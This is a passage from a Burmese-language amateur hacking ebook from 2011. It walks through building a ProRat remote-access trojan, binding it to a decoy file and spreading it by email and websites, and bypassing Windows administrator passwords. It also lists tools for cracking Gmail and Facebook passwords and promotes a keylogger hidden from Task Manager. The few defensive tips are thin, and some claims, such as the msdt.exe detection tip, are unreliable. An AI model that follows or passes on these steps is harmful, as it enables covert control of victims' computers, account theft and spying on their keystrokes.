ေနာက္ဆံုး လံုး၀မေလ့လာခ်င္ေတာ့ဘူးဆိုရင္ေတာ့…ဘိတ္ဆံုးအေနနဲ႔ PHP ေလးကိုေလ့လာဖို႔ေျပာခ်င္ပါတယ္
ဘာလ႔လို ဲဆိုေတာ့ အခုခ်ိန္မွာ PHP attacker ေတြက ေတာ္ေတာ္ေပါမ်ားေနပါတယ္။PHP language နဲ႔…
လုပ္လို႔ရတဲ့အရာေတြကေတာ္ေတာ္မ်ားပါတယ္။PHP web designer ေတြကလဲ ေတာ္ေတာ္ကိုထြက္လာပါျပီ။
ဒါေၾကာင့္ PHP ကိုေလ့လာဖို႔ေျပာခ်င္ပါတယ္။
တကယ္လို႔ Programming ကိုေလ့လာမယ္ဆိုရင္…ဒါေလးေတြကို မွတ္ထားေပးပါ။
၁…သင့္အေနနဲ႔ Programming ကိုေသခ်ာေလ့လာမွာျဖစ္တဲ့အတြက္…စာအုပ္ေကာင္းေကာင္းတစ္အုပ္ကို
၀ယ္ယူလိုက္ပါ။ျပီးရင္ အခ်ိန္ေတာ္ေတာ္မ်ားမ်ားကို အဲဒီ့စာအုပ္နဲ႔ ျဖဳန္းလိုက္ပါ။
၂…ေလ့လာေနရင္းနဲ႔လဲ ပစ္မထားပါနဲ႔။အခ်ိန္အၾကာၾကီး programming language ကိုပစ္ထားမယ္ဆိုရင္
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 13
ျပန္ျပီးေတာ့ ေမ့တတ္ပါတယ္။ေမ့သြားမယ္ဆိုရင္…ျပန္ေလ့လာရတာ ၾကာပါတယ္။အခ်ိန္ကုန္ပါတယ္။
၃…ျပီးေတာ့ စာအုပ္ထဲမွာပါတဲ့ ေလ့က်င့္ခန္းေတြကို computer နဲ႔ လုပ္ၾကည့္ပါ။လက္ေတြ႔ရိုက္ၾကည့္ပါ။
ဒါက သင္ေလ့လာေနတဲ့ language ကိုလ်င္လ်င္ျမန္ျမန္တတ္ေျမာက္ေစျပီးေတာ့…
ေမ့သြားတာကိုလဲ ေဖ်ာက္ဖ်က္နိုင္ပါတယ္။
၄…တကယ္လို႔ သင့္အေနနဲ႔စာအုပ္ထဲမွာပါတဲ့အေၾကာင္းအရာတစ္ခုကို နားမလည္ဘူးဆိုရင္ ေသခ်ာဖတ္ပါ။
အၾကိမ္ၾကိမ္အခါခါဖတ္ပါ။လံုး၀မရေတာ့ဘူးဆိုရင္ သင့္ကိုကူညီနိုင္မယ့္ လူတစ္ေယာက္ကိုရွာပါေတာ့။
၅…ဒီတစ္ခ်က္ကေတာ့ ေတာ္ေတာ္ေကာင္းပါတယ္။ဘာလုပ္ရမွာလဲဆိုေတာ့ internet ေပၚမွာရွိတဲ့……..
Programming forum ေတြကိုရွာျပီး member ၀င္ပါ။ျပီးရင္ အဲထဲမွာ ၀င္ေရာက္ေလ့လာပါ
အဲဒီလို forum ေတြမွာ professional ေတာ္ေတာ္မ်ားမ်ားရွိတတ္ပါတယ္။
၆…ေနာက္ဆံုးအခ်က္ကေတာ့…ေလ့က်င့္ခန္းမ်ားမ်ားလုပ္ပါ။code တစ္ခုကိုျမင္လိုက္တာနဲ႔ …….
ဒါဟာ ဘာ language နဲ႔ေရးထားတယ္ဆိုတာကိုသိေအာင္ၾကိဳးစားပါ။
ျပီးရင္ စိတ္ကူးေလးေတြ ထုတ္ပါ။အဲဒီ့စိတ္ကူးကို ကိုယ္တိုင္အေကာင္အထည္ေဖာ္ပါ။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 14
Chapter 3
Linux
Linux ဆိုတာဘာလဲ?
Linux ဆိုတာ free ရတဲ့ open source OS ျဖစ္ပါတယ္။ဒီေကာင့္ကိုဘာေၾကာင့္ထည့္သြင္းရတာလဲ။
ဟုတ္ကဲ့ ေျပာပါမယ္။ကမၻာေပၚမွာ ရွိတဲ့ hacker ေတာ္ေတာ္မ်ားမ်ားဟာ Linux ကိုသံုးၾကပါတယ္။
ဘာလို႔သံုးတာလဲ။ဒီလိုပါ။Hacker ေတြဟာ အသစ္အသစ္ေတြကိုဖန္တီးခ်င္ၾကပါတယ္။
Liux ဆိုတဲ့ operating system ဟာ Microsoft ကထုတ္တဲ့ window နဲ႔မတူပဲ သူ႔ဆီမွာပါတဲ့… အရာေတြကို
ျပန္လည္ ျပင္ဆင္လို႔ရပါတယ္။ဥပမာေပါ့…Linux မွာ built-in ပါလာတဲ့ software တစ္ခု။
အဲဒီ့ software ကို ကၽြန္ေတာ္က ျပင္ဆင္ခ်င္တယ္ဆိုရင္ ျပင္လို႔ရပါတယ္။ကိုယ္မၾကိဳက္တဲ့အခ်က္ေလးေတြကို
ထုတ္ပစ္တာေပါ့။(ဒါေပမယ့္ အဲဒီ လို ျပင္ဆင္ျပီးသား software ကို အမ်ားသူငါေရွ႕ကို ခ်ျပလို႔မရပါဘူး။
သူမ်ားေတြကိုလဲသိေစခ်င္တယ္ဆိုရင္ေတာ့…အဲဒီ့ software ကိုတီထြင္ခဲ့တဲ့ မူလလူထံဆီကေန…
Permission ေတာင္းရပါတယ္။---မွတ္ခ်က္)
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 15
Hacker သမားေတြကလဲ အသစ္ေတြကိုဖန္တီးခ်င္တယ္။ျပီးေတာ့ သူမ်ားတီထြင္ထားတာကိုလ ဲ
ထပ္ဆင့္ပိုေကာင္းေအာင္လုပ္ခ်င္တယ္…ဒါေတြအတြက္ Linux ကိုသံုးၾကပါတယ္။
ဒီထက္ ပိုျပီးေတာ့ Linux ကိုသံုးရတဲ့အခ်က္ေတြကေတာ့…
၁….ကမၻာေပၚမွာရွိတဲ့…Webserver ေတာ္ေတာ္မ်ားမ်ားဟာ Linux ကိုသံုးထားၾကပါတယ္။
ဘာလို႔ windows ကိုမသံုးတာလဲ။အဲဒီ့ေမးခြန္းအတြက္အေျဖကေတာ့…
Linux ရဲ့ security နဲ႔ Microsoft ကထုတ္တဲ့ window ရဲ့ security နဲ႔ယွဥ္လိုက္ရင္…Linux ရဲ့
Security ကပိုေကာင္းတာကိုေတြ႔ရပါတယ္။ျပီးေတာ့ virus ေတာ္ေတာ္မ်ားမ်ားလဲ မ၀င္နိုင္ပါဘူး။
ဒီထက့္ပိုေကာင္းတဲ့ အခ်က္ေတြအမ်ားၾကီးရွိပါတယ္။စကားလမ္းလြဲသြားမွာစိုးလို႔ မေျပာေတာ့ပါဘူး။
၂… အခ်ိဳ႕ေသာ hacking program ေကာင္းေကာင္းေတြက Linux ေပၚမွာပဲ..အသံုးျပဳနိုင္ပါတယ္။
၃… ဒီတစ္ခ်က္ေလးကေတာ့ နိုင္ငံရပ္ျခားေတြမွာ အေရးသိပ္မပါ ပါဘူး။
Linux က free ရျပီးေတာ့ Microsoft ကထုတ္တဲ့ window ကေတာ့ ပိုက္ဆံေပး၀ယ္ရပါတယ္။
(မွတ္ခ်က္---ကၽြန္ေတာ့မွာ Linux အေၾကာင္းေရးထားတဲ့ စာအုပ္ရွိပါတယ္။မၾကာခင္တင္ေပးပါမယ္။
ျပီးေတာ့ ကၽြန္ေတာ္ကိုယ္တိုင္လဲ Linux နဲ႔ window ကြာျခားခ်က္ေတြကိုေရးပါမယ္။)
ဒါေၾကာင့္ Hacker တစ္ေယာက္ျဖစ္ခ်င္တယ္ဆိုရင္ Linux ဆိုတဲ့ operating system ကိုလဲ ေလ့လာထားသင့္
ပါတယ္
သင့္အေနနဲ႔ Linux ကိုေလ့လာခ်င္တယ္။ဒါေပမယ့္ ဘယ္ကစရမွန္းမသိရင္…
ကၽြန္ေတာ္လမ္းညႊန္ေပးပါမယ္။
http://www.linux.org/
http://www.beginlinux.org/
http://www.linux-tutorial.info/ မွာေလ့လာနိုင္ပါတယ္။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 16
Chapter 4
Malware
What is Malware?
What is Malware? ရိုးရိုးေလးေျဖလိုက္မယ္။Malware = Virus. ျပီးေရာ ျပတ္တယ္ေနာ္။
Malware ဆိုတဲ့ အေကာင္ဟာ ယေန႔အခ်ိန္မွာ ျပသနာၾကီးတစ္ခုျဖစ္လာပါျပီ။ဟုိ computer တိုက္လိုက္၊
ဒီ computer တိုက္လိုက္နဲ႔။အားတယ္ကိုမရွိဘူး။
ေန႔တိုင္းေန႔တိုင္းမွာ လူေပါင္းမ်ားစြာဟာ အမ်ိဳးမ်ိဳးေသာ malware ေတြရဲ့တိုက္ခုိက္ျခင္းကိုခံေနရပါတယ္။
ကၽြန္ေတာ္ေျပာတာက လူေပါင္းမ်ားစြာရဲ့ computer ကိုေျပာတာပါ။
Malware အမ်ိဳးမ်ိဳးရွိပါတယ္။အဆိုးဆံုးေတြကေတာ့ virus,trojansနဲ႔ worms ဆိုတဲ့အေကာင္ေတြပဲျဖစ္ပါတယ္
ဟ…ဟ…ဘာလဲဟ hacker နဲ႔ Malware နဲ႔ဘာဆိုင္လို႔လဲကြ။အဲလိုမေမးပါနဲ႔။Hacker ေတာ္ေတာ္မ်ားမ်ားဟာ
Trojan ေတြကိုဖန္တီးတတ္ရပါမယ္။ဘာလို႔လဲဆိုေတာ့ သူ႕အေနနဲ႔ webserverတစ္ခုကို hackေတာ့မယ္ဆိုရင္
မ Hack ခင္မွာ Trojan ေတြကို ေမြးရပါတယ္အဲေလ ဖန္တီးရပါတယ္။
ျပီးရင္ လူအမ်ားစိတ္၀င္စားေအာင္ဆြဲေဆာင္ျပီး internet ေပၚကေန Trojan ေတြကို တျခားတစ္ေယာက္ရဲ့
Computer ထဲသို႔ထည့္သြင္းပါတယ္။ဒါဆိုရင္ သူဟာ Trojan ၀င္သြားတဲ့ စက္တိုင္းကို ထိန္းခ်ဳပ္နိုင္ပါျပီ။
ဒါေၾကာင့္လိုအပ္ပါတယ္။(ဒါကေတာ့ အက်ဥ္းေျပာျပထားတာပါ)
ကၽြန္ေတာ့အေနနဲ႔ ဒီ စာအုပ္မွာ ကိုယ္တိုင္ Trojan (malicious program)ကိုဖန္တီးနည္းေျပာျပပါမယ္။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 17
Definitions
1…virus-----virus ေတြဟာ လူရဲ့လုပ္ေဆာင္မႈမပါပဲနဲ႔မပ်ံ႕ႏွံ႔နိုင္ပါဘူး။သူတို႔ေတြဟာ ကပ္ပါးေကာင္ေတြပါပဲ။
သူတို႔ခ်ည္းပဲသီးသန္႔မပ်ံ႕နိုင္ပါဘူး။host file ဆိုတဲ့ virus ေတြကိုလက္ခံတဲ့ file ေတြရဲ့အကူ
လိုပါတယ္။အဲဒီလို လက္ခံတဲ့ file ေတြဟာကၽြန္ေတာ္တို႔ျမင္ဖူးေနၾက file ပံုစံေတြပါပဲ။
တကယ္လို႔မ်ားသင္ဟာ virus ကပ္ပါေနတဲ့ file ကို ဖြင့္မိမယ္ဆိုရင္ေတာ့…
အဲဒီ့ virus ကအသက္၀င္လာပါတယ္။ျပီးေတာ့ သင့္ရဲ့ computer ကိုေနွာက္ယွက္ပါေတာ့တယ္
သူတို႔ရဲ့ဆိုးသြမ္းခ်က္ေတြက hardware,software,file ေတြကိုဖ်က္စီးတာပါပဲ။
Virus ေတြဟာ file ေတြကို share(မွ်ေ၀တာ)လုပ္ရင္လဲ ပ်ံ႕နိုင္သလို…
Email ထဲက attachment မွာတြဲပို႕ရင္းနဲ႔လဲ ပ်ံ႕နိုင္ပါတယ္။
2…Worms--- virus ေတြနဲ႔မတူတဲ့ေကာင္ေတြကိုျပပါဆိုရင္ worms ေတြကိုျပရပါမယ္။worms ေတြက…
လူေတြရဲ့လုပ္ေဆာင္မႈမပါဘဲနဲ႔ပ်ံ႕နိုင္ပါတယ္။ဒီေကာင္ေတြက သူကိုယ္တိုင္ကုိယ္ပြားခြဲနိုင္တယ္
သူ႔ရဲ့ပံုစံတူ လုပ္ေဆာင္ခ်က္တူတဲ့ အေကာင္ေတြကိုပြားပါတယ္။သူကိုယ္တိုင္က system ကို
တိုက္ျပီဆိုရင္…တကယ့္ကုိယ္ပြားေတြအမ်ားၾကီးခဲြျပီးေတာ့တိုက္ပါတယ္။
3…Trojan--- ဒီေကာင္ေတြလဲဆိုးတာပဲ။ဒီေကာင္ စက္ထဲကို၀င္သြားျပီဆိုရင္လုပ္ခ်င္တာအကုန္လုပ္လို႔ရတယ္
အတိုက္ခံရသူရဲ့ desktop ေတြကိုေျပာင္းမယ္။file ေတြကိုဖ်က္မယ္။password ေတြကိုခိုးမယ္
အဆိုးဆံုး Trojan ၀င္သြားတဲ့ သူရဲ့စက္ကို အဲဒီ Trojan ဖန္တီးတဲ့သူက အေ၀းကေန
လွမ္းျပီးေတာ့ ပိတ္နိုင္တယ္ဗ်ာ။
Creating a malicious program with pro rat
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 18
Internet ကေန pro rat ဆိုတဲ့ software ကို download ဆြဲလိုက္ပါ။ဘယ္မွာေဒါင္းရမလဲဆိုေတာ့
http://prorat.net/downloads.php အဲဒီမွာေဒါင္းလို႔ရပါတယ္။
တကယ္လို႔ zip file နဲ႔ဆိုရင္ ျဖည္လိုက္ပါ။
Password ေတာင္းရင္ေတာ့ ကိုယ့္ကိစၥနဲ႔ကိုယ္ပဲေနာ္…ဟဲဟဲ
ကၽြန္ေတာ္သိတဲ့ password ကေတာ့ pro ျဖစ္ပါတယ္။
ျပီးရင္ install လုပ္စရာရွိတာကိုလုပ္။install လုပ္ျပီးရင္…program ကိုဖြင့္ပါ။
ဒီပံုအတိုင္းျမင္ရပါမယ္။
Create ကိုႏွိပ္ပါ။ျပီးရင္ create proratserver ကိုေရြးပါ။
ျပီးရင္ သင့္စက္ရဲ့ Ip address ကိုထည့္လိုက္ပါ။email ကိုပါထည့္ပါ။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 19
ထည့္ျပီးသြားရင္ General setting ကိုႏွိပ္ပါ။ေအာက္ကပံုအတိုင္းျဖည့္စရာေတြကိုျဖည့္လိုက္ပါ။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 20
Bind with File ကိုႏွိပ္ပါ။Bind ကိုသိတယ္ေနာ္။ၾကိဳးျဖင့္ခ်ည္တာပါ။
ဒါေၾကာင့္ Trojan ကို file တစ္ခုနဲ႔တြဲလိုက္တာပါ။တစ္ခုမွတ္ထားရမွာက computer အသံုးျပဳသူက Trojan
ကပ္ပါလာတဲ့ file ကို ဖြင့္မွသာ Trojan က
လႈပ္ရွားမွာျဖစ္ပါတယ္။Bind with file ကိုႏွိပ္ျပီးရင္ select file ကိုေရြးပါ။ကိုယ္တြဲထားခ်င္တဲ့ file
တစ္ခုကိုေရြးေပးလိုက္ပါ။
အိုေက file တြဲျပီးသြားျပီဆိုရင္…Server Extensions ကိုႏွိပ္ပါ။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 21
အဲဒီမွာ EXE(…) ကိုေရြးပါ
ေရြးျပီးရင္ server icon ကိုႏွိပ္ပါ။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 22
အခုခ်ိန္မွာ သင့္အေနနဲ႔ မိမိႏွစ္သက္တဲ့ icon တစ္ခုကိုေရြးလို႔ရပါျပီ။
ၾကိဳက္တာကိုေရြးပါ။ေနာက္ဆံုးမွာေတာ့ create server ကိုႏွိက္လိုက္ပါေတာ့။
ဒါဆိုရင္ Trojan တစ္ခုကိုဖန္တီးျခင္းျပီးဆံုးသြားပါျပီ။Hacker တစ္ေယာက္ကေတာ့ ဒီအတိုင္း…
ရပ္ေနမွာမဟုတ္ပါဘူး။အဲဒီ Trojan ကို user ေတြထံ ျပန့္သြားေအာင္ လုပ္မွာပါ။
လုပ္နည္းေတြကေတာ့ အမ်ားၾကီးပါ။ဥပမာ mail မွာ attachment နဲ႔တြဲပို႔တာတို႔…website ေတြမွာလိုက္
ျဖန္႔တာတို႔ေပါ့။ဒါေပမယ့္ လူစိတ္၀င္စားေအာင္လုပ္ဖို႔ေတာ့လိုပါတယ္။ဒါမွလဲ…user က download ဆြဲမွာေပါ့။
ကဲ ဒီေနရာေလးမွာ creating a Trojan with ProRat ဆိုတဲ့က႑ေလးအဆံုးသတ္လိုက္ပါမယ္။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 23
How to prevent from Malware
မိမိကိုယ္တိုင္က အဲဒီလို trojan ၀င္တာမခံခ်င္ဘူးဆိုရင္ ကာကြယ္လို႕ရတဲ့နည္းလမ္းေတြရွိပါတယ္။
ဘာလဲဆိုေတာ့…..အပတ္စဥ္ျဖစ္ျဖစ္ ေန႔စဥ္ျဖစ္ျဖစ္ update လုပ္တဲ့ antivirus software တစ္ခုရွိရပါမယ္။
ျပီးေတာ့…Firewall ကိုလဲမိမိရဲ့စက္မွာထည့္သြင္းထားရပါမယ္။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 24
Chapter 5
Hacking Window PASSWORD
Cracking window password
ကၽြန္ေတာ္ ဒီစာအုပ္မွာ…window ရဲ့ admin password ကိုေက်ာ္တဲ့နည္းေလးေျပာျပပါမယ္။
ကၽြန္ေတာ္သိတာကေတာ့ တစ္နည္းပဲရွိပါတယ္။ဒါေပမယ့္ window xp မွာေတာ့ ၂နည္းပါ
Window xp မွာ ပထမနည္းက window ကို safe mode နဲ႔တက္လိုက္ပါ။ F8 ကိုႏွိပ္ျပီးတက္ရတာျဖစ္ပါတယ္။
ဒါဆိုရင္ password မေတာင္းပါဘူး။ျပီးေတာ့မွ…ကုိယ့္ဘာသာ password ေျပာင္းလိုက္ပါ။
Control panel ထဲကေန password ကိုေျပာင္းလို႔ရပါတယ္။
ေနာက္တစ္နည္းကေတာ့ တျခား window ေတြနဲ႔အတူတူပါပဲ။
http://www.hirenbooted.org/download မွာ Hiren’s CD ကိုအရင္ download ဆြဲပါ။
ျပီးရင္ အေခြတစ္ေခြနဲ႔ burn လိုက္ပါ။
Password ကိုဖယ္မယ္ဆိုရင္ Bios setting ထဲမွာ First boot ကို အရင္ဆံုး DVD or CD Drive
ကိုေရြးေပးရပါမယ္။
ေအာ္ေမ့လို႔ ေဒါင္းလုပ္ဆြဲထားတဲ့ဟာကို CD အလြတ္တစ္ခ်က္ထဲကို Burn ရမယ္ေနာ္။
ကဲျပန္စမယ္…ေရြးျပီးျပီဆိုရင္ CD ကိုထည့္လိုက္ပါ။
Boot ကေနျပီး Hiren’s CD ကို Run ပါ
Password ကိုဖယ္မွာျဖစ္တဲ့အတြက္ Password & Registry tool ကိုေရြးပါ။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 25
ဘယ္လိုေရြးရမလဲဆိုေတာ့ သူ့ေရွ့ကနံပါတ္ကိုရိုက္ရမွာျဖစ္ပါတယ္။Mouse နဲ့ေရြးလို့မရပါဘူး။
ပထမအဆင့္ေရြးျပီးရင္ ေနာက္တစ္ဆင့္က offline NT/2000/XP/vista/7 password changer
ကိုေရြးရပါမယ္
ျပီးရင္ေတာ့ ေမ့သြားတဲ့ Password ကိုျပန္ျဖတ္နိုင္မွာျဖစ္ပါတယ္။ ျဖတ္ျပီးရင္ေတာ့ ‘q’ ကိုႏွိပ္ျပီး
Enter ေခါက္ျပီးေတာ့ ထြက္သြားရပါမယ္။
အားလံုးျပီးရင္ေတာ့ ကြန္ပ်ဴတာကို restart ခ်ရပါမယ္။
Window ျပန္တက္လာရင္ေတာ့ password ရွိေတာ့မွာမဟုတ္ပါဘူး။ဒါေလးကေတာ့သိသေလာက္ေလးပါ။
အဲဒါေလးကို ျပန္လည္ကာကြယ္ခ်င္တယ္ဆိုရင္ေတာ့….
How to prevent window password from changing
ကုိယ့္ password ကိုသူမ်ားေျပာင္းလို႔မရေအာင္လုပ္တဲ့နညး္ပါ။
Window key + R> gpedit.msc>user configuration>administrative template>system>ctrl+alt+
Del ….ျပီးရင္ ညာဘက္ျခမ္းမွာျမင္ရတဲ့ Remove change password ကိုdouble click နဲ႔၀င္ပါ။
ျပီးရင္ enable ဆိုတာကို အမွန္ျခစ္ေပးပါ။ apply,ok နဲ႔ျပန္ထြက္လာလို႔ရပါျပီ။
ဒါဆိုရင္ေတာ့…password ကပိုျပီးေတာ့စိတ္ခ်ရပါတယ္။
Changing Window Password while using computer
Computer ကိုသံုးေနစဥ္အတြင္း password ကို ေျပာင္းခ်င္ရင္ေတာ့…
Window key + R> cmd
အဲဒီမွာ net user ….ဆိုျပီး user နာမည္ကိုရိုက္ပါ။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 26
ျပီးရင္ က်လာတဲ့ စာေၾကာင္းေတြမွာ…password ကိုရိုက္။confirm password ကိုထပ္ရုိက္ပါ။
ဒါဆိုရင္ အစဥ္ေျပပါျပီ……….. ^_^
ဒါက window xp မွာေျပာတာပါ။window 7မွာဆိုရင္ေတာ့…cmd ကို run as administrative နဲ႔ဖြင့္ရပါမယ္။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 27
Chapter 6
Password
ဒီေန႔ ေခတ္မွာ password ဆိုတဲ့စကားလံုးဟာလူတိုင္းနဲ႔စိမ္းေတာ့တာမဟုတ္ပါဘူး။
ဟိုေနရာလဲ password ဒီေနရာလဲ password ျဖစ္ေနမွေတာ့ လူတိုင္းက ရင္းႏွီးေနျပီေပါ့။
Hacker ေတာ္ေတာ္မ်ားမ်ားဟာ password ကို hack ဖို႔အတြက္ နည္းလမ္းေပါင္းစံုနဲ႔ၾကိဳးစားပါတယ္
ဒါေၾကာင့္ password တစ္ခုကို hack မယ္ဆိုရင္ နညး္လမ္းမ်ားစြာနဲ႔ HACK လို႔ရပါတယ္။
ကၽြန္ေတာ္ကလဲ သိသေလာက္နည္းလမ္းေလးေတြကိုေျပာျပပါမယ္။
Hacking Gmail password !!!!!!!(easiest way)
Gmail ကို hack တဲ့နည္းေတြေတာ့အမ်ားၾကီးရွိတာပါပဲ။တခ်ိဳ႕ကေတာ့ Phishing ကိုသံုးတယ္။
ဒါေပမယ့္ Phishing ကသိပ္မလြယ္ပါဘူး။အခ်ိန္နဲနဲၾကာတယ္။သူမ်ားကတစ္ဆင့္ေျပာထားေပမယ့္
မလုပ္တတ္ရင္တိုင္ပတ္ေနေရာ…တကယ္လို႔ လုပ္တတ္ခ်င္သပဆိုရင္ ကၽြန္ေတာ္ဒီစာအုပ္ထဲမွာ…တျခား
Website ကေန ကူးထားတဲ့ အဂၤလိပ္စာေၾကာင္းေလးေတြ ထည့္ထားပါတယ္။အဲဒါေလးကို ဖတ္ျပီးေတာ့လုပ္ပါ
ဒါေပမယ့္ Gmail ကို hack ဖို႔အတြက္ အလြယ္ဆံုးနည္းကေတာ့ software သံုးျပီး hack တာပါပဲ။
ဒါေၾကာင့္ ကၽြန္ေတာ့အေနနဲ႔ software နာမည္ေတြ ကို ေျပာလဲေျပာျပခ်င္ပါတယ္။
ေျပာလဲ မေျပာျပခ်င္ဘူးဗ်။ဘာလို႔လဲဆိုေတာ့ အင္တာနက္ဆိုတာၾကီးက ေကာင္းတဲ့လူရွိသလို
မေကာင္းတဲ့လူလဲရွိတယ္ေလ။
ဘာပဲျဖစ္ျဖစ္ေျပာျပလိုက္ပါမယ္။
Webmail hack v.2.6
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 28
Advanced Password Retriever(APR)
ဒါေလးကေတာ့ နာမည္ေတြပဲေျပာထားတာပါ။သူတို႔ကေတာ့ ေတာ္ေတာ္ေကာင္းတယ္ခင္ဗ်။ရွယ္ပဲ
ဒါေပမယ့္လဲ ကၽြန္ေတာ္တို႔ျမန္မာလူမ်ိဳးေတြ တတ္ေျမာက္ေစဖို႔အတြက္…
http://www.oxid.it/cain.html (can and abel)
http://www.openwall.com?john/ (john the ripper)
http://freeworld.thc.org/thc-hydra/ (thc hydra)
http://www.solarwinds.com/ (solar winds)
http://www/antsight.com/zsl/rainbowcrack/ (rainbow crack) ဒါေလးေတြကိုေတာ့ေျပာထားမယ္ေနာ္
ကဲ အားလံုးပဲ ကုိယ္ဥာဏ္ရွိသလိုသာသံုးၾကပါေတာ့ဗ်ိဳ႕…………….
Hacking Facebook account!!!!!(easiest way)
ဒီေကာင္က်ေတာ့ tools ကနဲနဲမ်ားတယ္ဗ်။ေျပာျပမယ္ဗ်ာ။တကယ္လိုခ်င္ရင္ေတာ့ ကိုယ့္ဘာသာရွာၾကပါေနာ္
သူမ်ားကိုလိုက္ဒုကၡမေပးၾကပါနဲ႔။
Facebook Freezer
Password Finder
Facebook Cracker
Facebook hacking machine
Advanced Password Retriever(APR)
Firebug
Facebook password stealer
Ultimate account hack pro ေတြပဲျဖစ္ပါတယ္။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 29
ကၽြန္ေတာ့ဆီမွာေလ အဲဒီ့ tools ေတြေတာ့အစံုရွိတယ္ခင္ဗ်။ဒါေပမယ့္တင္ေပးရဲဘူး။
မေကာင္းတဲ့သူေတြလက္ထဲေရာက္မွာစိုးလို႔ပါ။
အခုေတာင္ software နာမည္ေတြေျပာျပတာ လြန္လွျပီ။
ဘာလို႔လဲဆိုေတာ့ ရွာတတ္တဲ့သူေတြကို ေအးေအးေဆးေဆးပဲေလ။
ဒါေပမယ့္ အဲဒီေလာက္မလြယ္ပါဘူးခင္ဗ်။ေပးထားတာေတြက Free ရတာသိပ္မရွိပါဘူး။
အကုန္လံုး Product key ,serial key ေတြနဲ႔မွ သံုးလို႔ရမွာပါ။
ျပီးေတာ့တခ်ိဳ႕ေကာင္ေတြဆိုရင္ download ဆြဲလိုက္တာနဲ႔စက္ထဲကို virus ၀င္ပါတယ္။
မယံုမရွိပါနဲ႔။တကယ္ေျပာတာပါ။
ဒီေနရာမွာ password ကို hack တဲ့အေၾကာင္း password ကို crack တဲ့အေၾကာင္း ရပ္လိုက္ပါမယ္။
BE ENJOY!!!!!!!!!!!!!MY FRIENDS
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 30
Chapter 7
Key-logging
About Keyloggers
Key-logging ဆိုတာကမိမိရဲ့ keyboard မွာရိုက္သမွ်ကိုမွတ္တမ္းတင္တာကိုေျပာျခင္းျဖစ္ပါတယ္
တနည္းေျပာရရင္ keyboard ကရိုက္သမွ်ကို မွတ္ထားတာေပါ့ဗ်ာ။
အဲလိုေလးမွတ္ထားခံလိုက္ရျပီဆိုရင္ေတာ့ သင့္ရဲ့ ကိုယ္ေရးကိုယ္တာေတြ password ေတြခိုးခံရဖို႔က
၇၅%ရွိပါတယ္။က်န္တဲ့ ၂၅%ကေတာ့ လုပ္တဲ့သူရဲ့စိတ္ဓာတ္ေပၚမွာမူတည္ပါတယ္။
အဲဒီ့ Key-logging ကိုဘယ္လိုလုပ္သလဲ။ဟုတ္ျပီေျပာပါမယ္။
Software ကိုသံုးျပီးလုပ္ပါတယ္။ဘာ software လဲ။keylogger software လို႔ေခၚပါတယ္။
Keylogger ဆိုတာ ကို hacking ေလာကထဲစတင္၀င္ေရာက္လာတဲ့ လူတိုင္းၾကားဖူးမွာပါ။
မိမိkeyboard ကရိုက္သမွ်ကုိမွတ္ထားျပီးေတာ့ software အသံုးျပဳသူက ျပန္ၾကည့္လို႔ရပါတယ္။
ကၽြန္ေတာ့မွာရွိတဲ့ keylogger လင့္ေလးတင္ေပးပါမယ္။
KGB Keylogger
KGB keylogger ျဖစ္ပါတယ္။နာမည္ကေတာ့ ေျပာထားတဲ့အတိုင္း KGB keylogger ပါပဲ။
Myanmar Basic Hacking ebook 2011
w w w . m y a n m a r h a c k i n g . c o m
Page 31
Keylogger(old ver) ေတာ္ေတာ္မ်ားမ်ားဟာ…keyboard ကရိုက္သမွ်ကိုသာမွတ္တမ္းတင္ၾကပါတယ္။
ဒါေၾကာင့္ username နဲ႔ password ေတြ အကုန္သိၾကပါတယ္။
တကယ္လို႔ စက္တစ္လံုးမွာ keylogger သြင္းထားလား မသြင္းထားဘူးလားသိခ်င္ရင္
Ctrl + alt + del နဲ႔ task manager ကိုေခၚပါ။
Process tab ေအာက္ကိုသြားပါ။ msdt.exe ဆိုတဲ့ process ရွိရင္ သြင္းထားပါတယ္။မရွိရင္ေတာ့ မသြင္းဘူး။
ဒါေၾကာင့္ အဲဒီ့ process ကို end process ေပးလိုက္ပါ။
ဒါဆိုရင္စိတ္ခ်လက္ခ်သံုးလို႔ရပါျပီ။ဒါကေတာ့ တျခားkeylogger ေတြအတြက္ေျပာတာပါ။
ကၽြန္ေတာ္ေပးထားတဲ့ keylogger ေတာ့ အဲလိုမဟုတ္ပါဘူး။ဒါဆိုဘယ္လိုလဲ။ေျပာပါမယ္။
KGB ဟာ keyboard ကရိုက္သမွ်ကိုသာမွတ္ရံုတင္မကပဲ screenshot ေတြကိုပါမွတ္ပါတယ္။
ဒါေၾကာင့္ user ေတြ ဘာကိုၾကည့္ခဲ့တယ္ဆိုတာကိုသိနိင္ပါတယ္။
ျပီးေတာ့ user ေတြၾကည့္ခဲ့တဲ့ website ေတြကိုလဲမွတ္ပါတယ္။သံုးခဲ့တဲ့ program ေတြကိုလဲမွတ္ပါတယ္။
တျခားkeylogger ေတြလို task manager ေခၚၾကည့္ရင္ မေပၚပါဘူး။(ဒါကေတာ့ install လုပ္တဲ့အခါမွာ
မေပၚေအာင္လုပ္ရတာပါ)
